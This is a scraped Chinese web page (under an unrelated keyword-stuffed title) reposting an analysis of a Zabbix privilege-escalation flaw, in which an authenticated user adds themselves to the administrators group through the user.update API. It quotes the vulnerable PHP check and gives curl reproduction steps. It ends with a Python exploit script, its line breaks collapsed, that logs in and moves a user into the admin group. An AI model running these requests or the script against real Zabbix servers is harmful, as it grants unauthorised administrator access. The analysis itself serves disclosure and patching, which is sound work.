当前位置：首页 > news >正文

网站开发源代码wap网站源码.net

news 2025/11/1 0:25:12

网站开发源代码,wap网站源码.net,网站宽屏,windows10 wordpress漏洞描述在Zabbix中，具有API访问权限的已认证用户（例如具有默认用户角色的用户）可以通过调用user.update API接口，将自己添加到任何用户组（如Zabbix管理员组）。然而，用户无法添加到已被禁用或…

漏洞描述

在Zabbix中，具有API访问权限的已认证用户（例如具有默认用户角色的用户）可以通过调用user.update API接口，将自己添加到任何用户组（如Zabbix管理员组）。
然而，用户无法添加到已被禁用或具有受限GUI访问权限的用户组。
该漏洞源于缺乏对用户组添加操作的授权检查。

影响版本

Zabbix 5.0.42
Zabbix 6.0.32
Zabbix 6.4.17
Zabbix 7.0.1rc1

源码分析

在validateUpdate 函数中，调用了第 542 行第 1109 行的 checkHimself 函数。checkYourself 函数包含以下代码：

private function checkHimself(array $users) {
foreach ($users as $user) {
if (bccomp($user['userid'], self::$userData['userid']) == 0) {
if (array_key_exists('roleid', $user) && $user['roleid'] !=
self::$userData['roleid']) {
self::exception(ZBX_API_ERROR_PARAMETERS, _('User cannot change
own role.'));
}
if (array_key_exists('usrgrps', $user)) {
$db_usrgrps = DB::select('usrgrp', [
'output' => ['gui_access', 'users_status'],
'usrgrpids' => zbx_objectValues($user['usrgrps'], 'usrgrpid')
]);
foreach ($db_usrgrps as $db_usrgrp) {
if ($db_usrgrp['gui_access'] == GROUP_GUI_ACCESS_DISABLED
|| $db_usrgrp['users_status'] ==
GROUP_STATUS_DISABLED) {
self::exception(ZBX_API_ERROR_PARAMETERS,
_('User cannot add himself to a disabled group or a
group with disabled GUI access.')
);
}
}
}
break;
}
}
}

if (bccomp($user['userid'], self::$userData['userid']) == 0) ：bccomp 比较当前遍历的用户 ID 和当前登录用户 ID（self::$userData['userid']），如果匹配（返回 0），说明用户在尝试修改自己的数据。
if (array_key_exists('roleid', $user) && $user['roleid'] != self::$userData['roleid']) {self::exception(ZBX_API_ERROR_PARAMETERS, _('User cannot change own role.'));}：当要修改的用户id与当前用户的id不一致时将会报错。即只能修改自己的数据。

if (array_key_exists('usrgrps', $user)) {$db_usrgrps = DB::select('usrgrp', ['output' => ['gui_access', 'users_status'],'usrgrpids' => zbx_objectValues($user['usrgrps'], 'usrgrpid')]);

这段代码用于检查用户组权限，如果请求中包含 usrgrps（用户组变更），就从数据库查询这些组的 gui_access 和 users_status 字段。

foreach ($db_usrgrps as $db_usrgrp) {if ($db_usrgrp['gui_access'] == GROUP_GUI_ACCESS_DISABLED|| $db_usrgrp['users_status'] == GROUP_STATUS_DISABLED) {self::exception(ZBX_API_ERROR_PARAMETERS, _('User cannot add himself to a disabled group or a group with disabled GUI access.'));}
}

这段代码用于验证组的状态，如果处于禁用或禁止GUI访问状态，就会报错。

从以上代码可以看出用户只能修改自己的数据，在用户组变更时没有对用户的权限进行校验，只检查用户组的状态，因此用户可以将自己添加进任意组中。

复现步骤

（1）尝试登陆，如果登陆成功会返回登陆凭证

curl --request POST \
--url 'http://192.168.116.134/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{"jsonrpc":"2.0","method":"user.login","params":
{"username":"user","password":"yong1234"},"id":1}'

（2）修改当前用户的用户组

原本user属于Guests群组

输入命令

curl --request POST \
--url 'http://192.168.116.134/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{"jsonrpc":"2.0","method":"user.update","params":
{"userid":"3","usrgrps":[{"usrgrpid":"7"}]},"auth":"7f33020f67fc24a13bf37b72e974d73a","id":1}'

发现user的群组已经更改为管理员群组了

EXP

import requests
import jsondef get_auth(target, username, password):login_url = f"http://{target}/api_jsonrpc.php"headers = {'Content-Type': 'application/json-rpc','User-Agent': 'Zabbix-Privilege Escalation-Scanner'}login_data = {"jsonrpc": "2.0","method": "user.login","params": {"username": username,"password": password},"id": 1}try:login_response = requests.post(login_url,headers=headers,data=json.dumps(login_data),timeout=10,verify=False)if login_response.status_code != 200:print(f"[-] 登录失败，HTTP状态码: {login_response.status_code}")return Falselogin_result = login_response.json()auth_token = login_result['result']print(f"[+] 成功获取认证令牌: {auth_token}")return auth_tokenexcept requests.exceptions.RequestException as e:print(f"[-] 请求失败: {str(e)}")return Falseexcept json.JSONDecodeError as e:print(f"[-] JSON解析失败: {str(e)}")return Falsedef update_user_group(target, auth_token):update_url = f"http://{target}/api_jsonrpc.php"headers = {'Content-Type': 'application/json-rpc','User-Agent': 'Zabbix-Privilege Escalation-Scanner'}update_data = {"jsonrpc": "2.0","method": "user.update","params": {"userid": "3","usrgrps": [{"usrgrpid": "7"}]},"auth": auth_token,"id": 1}try:response = requests.post(update_url,headers=headers,data=json.dumps(update_data),timeout=10,verify=False)update_result = response.json()if response.status_code != 200:print(f"[-] 更改失败，HTTP状态码: {response.status_code}")return Falseelse:print(update_result)except requests.exceptions.RequestException as e:print(f"[-] 更改请求失败: {str(e)}")return Falseexcept json.JSONDecodeError as e:print(f"[-] JSON解析失败: {str(e)}")return Falseif __name__ == '__main__':target = input("请输入目标IP:")username = input("请输入用户名:")password = input("请输入密码:")auth_token = get_auth(target, username, password)update_user_group(target, auth_token)

查看全文

http://www.dtcms.com/a/551861.html